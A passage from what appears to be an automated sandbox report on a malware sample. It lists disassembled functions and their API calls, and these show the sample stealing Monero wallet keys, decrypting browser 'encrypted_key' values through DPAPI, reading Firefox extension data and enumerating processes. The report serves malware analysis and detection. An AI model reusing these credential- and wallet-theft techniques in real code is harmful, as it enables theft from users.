                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 21ae1a864fa80d914cb2d19547dd9a776407756d056ac66c39ac6f445a0a5370
                              • Instruction ID: 945fe42fdde214661b13c524fefdc27fdefc275856ec2f292677084ba0825a33
                              • Opcode Fuzzy Hash: 21ae1a864fa80d914cb2d19547dd9a776407756d056ac66c39ac6f445a0a5370
                              • Instruction Fuzzy Hash: EFE1E472910108EBDB45FBA4DC9AEEE7378AF55300F508269F51772091EF3C6A49CB62
                              Function 0079D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0079D481
                              • lstrlen.KERNEL32(00000000), ref: 0079D698
                              • lstrlen.KERNEL32(00000000), ref: 0079D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0079D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: fb2c02b27d909e0074f1d0d72ae6fba94fa1490b39ca5de3a4fc543811c8a6af
                              • Instruction ID: 6b86ea0e534b86d545e9306e65dfe0297f740dbf1582757674a52a07d698d17e
                              • Opcode Fuzzy Hash: fb2c02b27d909e0074f1d0d72ae6fba94fa1490b39ca5de3a4fc543811c8a6af
                              • Instruction Fuzzy Hash: A3912771910108EBCB45FBA4DC9AEEE7378AF95300F508269F50776091EF3C6A49CB62
                              Function 0079D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0079D801
                              • lstrlen.KERNEL32(00000000), ref: 0079D99F
                              • lstrlen.KERNEL32(00000000), ref: 0079D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0079DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 0fe367807983ee17155bf588075c1407a37defc0ce30727b118bdf98a7b99f89
                              • Instruction ID: f7ac270fd7c48a6b83ab96f5ce4c82ee5e2415ba9a35824c2233067ec23c7868
                              • Opcode Fuzzy Hash: 0fe367807983ee17155bf588075c1407a37defc0ce30727b118bdf98a7b99f89
                              • Instruction Fuzzy Hash: B9811471910108EBCB45FBA4DC9AEEE7378AF95300F504229F507A6091EF3C6A59DB62
                              Function 0079F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,007B1580,007B0D92), ref: 0079F54C
                              • lstrlen.KERNEL32(00000000), ref: 0079F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 7a4a297be2605bf4e500dfbc311f7746c6a026ef13534b43e080e436d5cf102e
                              • Instruction ID: a315c28f8d7f682d16097f85ea9754b7fbbf453a54dbf6fbdaef52188f68f32e
                              • Opcode Fuzzy Hash: 7a4a297be2605bf4e500dfbc311f7746c6a026ef13534b43e080e436d5cf102e
                              • Instruction Fuzzy Hash: AA51E171D10108FADB44FBA4DC5ADEE7378AF95300F408628F416A7191EF3C6A19CBA2
                              Function 007A70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                              Download Yara Rule
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 007A718C
                              • sz, xrefs: 007A7111
                              • sz, xrefs: 007A72AE, 007A7179, 007A717C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: sz$sz$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 3722407311-3791023486
                              • Opcode ID: 8e21edf305c1ca45e05947355d544b45f4865bbe45b6c82deaeea4a46998f46e
                              • Instruction ID: cfe30da6f2fa4c9393c3a4e803a956222351560996f1ac4fcc8277ca03d09b2b
                              • Opcode Fuzzy Hash: 8e21edf305c1ca45e05947355d544b45f4865bbe45b6c82deaeea4a46998f46e
                              • Instruction Fuzzy Hash: E05175B1D0421CDBDB64EB90DC85BEEB3B4AF95304F1042A8E11577181EB786E88CF55
                              Function 007A3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: ac750f3f1ca889bdce9478f263c1d29589a616140bbd38136526640225f58c23
                              • Instruction ID: 9bff2585a0438863221f7713cda39d095d01b3408c73b73fadcf34b687d617aa
                              • Opcode Fuzzy Hash: ac750f3f1ca889bdce9478f263c1d29589a616140bbd38136526640225f58c23
                              • Instruction Fuzzy Hash: 074131B1D10109EFCB04EFA4D849AFEB774AF85304F008618F51677250EB79AA45CFA2
                              Function 00799CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00799D39
                                • Part of subcall function 00799AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799AEF
                                • Part of subcall function 00799AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00794EEE,00000000,?), ref: 00799B01
                                • Part of subcall function 00799AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799B2A
                                • Part of subcall function 00799AC0: LocalFree.KERNEL32(?,?,?,?,00794EEE,00000000,?), ref: 00799B3F
                                • Part of subcall function 00799B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00799B84
                                • Part of subcall function 00799B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00799BA3
                                • Part of subcall function 00799B60: LocalFree.KERNEL32(?), ref: 00799BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 88af9720d6453c46b66bbd1db648e42da607451127188b02addb8bf27a38a91a
                              • Instruction ID: 234c0d27588e5d268045124a64ff2bcc67bdbfc2ba4a9142d1b48b236fc20ef3
                              • Opcode Fuzzy Hash: 88af9720d6453c46b66bbd1db648e42da607451127188b02addb8bf27a38a91a
                              • Instruction Fuzzy Hash: 5A3110B5E10109EBDF04DBE8EC85AEFB7B8BB49304F54451DEA05A7241E7389A14CBA1
                              Function 007A8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007B05B7), ref: 007A86CA
                              • Process32First.KERNEL32(?,00000128), ref: 007A86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 007A86F3
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • CloseHandle.KERNEL32(?), ref: 007A8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: fe3f02df61d758ac462ad5455d5fb3d4f3abe37436468be964108a3f78391cc6
                              • Instruction ID: 701adf380d723325944d1a81c28e502c2fd251e0c3934021a8aac2fce55abf63
                              • Opcode Fuzzy Hash: fe3f02df61d758ac462ad5455d5fb3d4f3abe37436468be964108a3f78391cc6
                              • Instruction Fuzzy Hash: E3314F71911218EBCB65DF54CC45FEEB778EF86700F104299F50AA61A0DB386A45CFA2
                              Function 007A7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,007B0E00,00000000,?), ref: 007A79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,007B0E00,00000000,?), ref: 007A79C4
                              • wsprintfA.USER32 ref: 007A79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: b8baadbfd839ca0f4c0df8060d2657e6d25bb806241f410b10000c5da9b8b66a
                              • Instruction ID: 1dada26927cd9d07beeb8ec361a42532b45c98488cc789c7556184002f0e8770
                              • Opcode Fuzzy Hash: b8baadbfd839ca0f4c0df8060d2657e6d25bb806241f410b10000c5da9b8b66a
                              • Instruction Fuzzy Hash: D6112AB2958118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AFA05A2280D3395950D7B5
                              Function 007AC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 007AC74E
                                • Part of subcall function 007ABF9F: __amsg_exit.LIBCMT ref: 007ABFAF
                              • __getptd.LIBCMT ref: 007AC765
                              • __amsg_exit.LIBCMT ref: 007AC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 007AC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
